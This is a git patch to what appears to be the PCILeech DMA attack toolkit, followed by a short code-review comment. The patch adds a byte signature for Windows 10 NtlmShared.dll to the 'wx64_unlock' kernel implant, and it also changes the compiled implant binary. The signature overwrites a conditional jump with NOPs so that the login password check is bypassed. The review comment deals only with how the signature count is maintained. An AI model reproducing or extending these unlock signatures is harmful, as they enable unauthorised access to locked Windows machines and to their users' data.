From c996dc1bcad98aeb4252497bad46f040ca515d4b Mon Sep 17 00:00:00 2001 From: ufrisk Date: Mon, 15 Aug 2016 23:16:31 +0200 Subject: [PATCH] implant: add unlock signature [wx64_unlock] --- pcileech_files/wx64_unlock.ksh | Bin 1965 -> 2029 bytes pcileech_shellcode/wx64_unlock.c | 7 ++++++- 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/pcileech_files/wx64_unlock.ksh b/pcileech_files/wx64_unlock.ksh index 247063d12b958b5c1edaab49cc18e8349b4d054b..c62843a3892e9cfdb54a1c7bfe18912a2a67dfd5 100644 GIT binary patch delta 293 zcmZ3>|CZm@T=*ItoY2Dq^g~{)(IL(Kz)#gts%cy~s?enUMhk*x4ZT zB2fsPGSN|aVgL(Ym`C>)kLD*IJeuDqyqG?*XcdzN%Var5Pq7sqjc*Kqx{VJUcTq98 z&&u-Oqc`-!<`7e6;nClto z3s#xs*&F#lmx+5D8{1QP%Qt8^m( delta 228 zcmaFMzn0(DT=#jkH$9wK;6a%j=QKB z+-GI^@6j82VR9{F*ye|fjEsC~$6b$1V0f|c@Bjb*Lmy05WNtBj;nV%VqxC?Eo=>lj ziUClY0?1Ow9SlHYJbHaEcywQQ5d{?S?7r&ReWv@v|IiPUZ!l|fTq5+U@|w0 R%w!FgKa44xRas9k0RT1QS7rbJ diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c index 921b5aa..34ca07e 100644 --- a/pcileech_shellcode/wx64_unlock.c +++ b/pcileech_shellcode/wx64_unlock.c @@ -129,7 +129,7 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages return E_FAIL; } -#define NUMBER_OF_SIGNATURES 5 +#define NUMBER_OF_SIGNATURES 6 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = { @@ -157,6 +157,11 @@ NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } }, { .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + { .chunk = { // win10x64 NtlmShared.dll (2016-07-16::10.0.14393.0) + { .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } }, + { .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, + { .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } } }; KERNEL_FUNCTIONS2 fnk2;
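Review bot: The signature count is still maintained by hand: the first hunk has to raise `NUMBER_OF_SIGNATURES` from 5 to 6 in step with the entry the second hunk appends to `oSigs`, and nothing ties the two together. Declaring the table as `SIGNATURE oSigs[] = {` and taking the count from `sizeof(oSigs) / sizeof(oSigs[0])` would remove that coupling. As written, raising the macro without adding an initializer leaves a zero-initialized trailing element, and how `Unlock_FindAndPatch` treats an all-zero signature is not visible in this patch. The body of `Unlock` continues outside the hunk, so any other use of the macro there would need the same change.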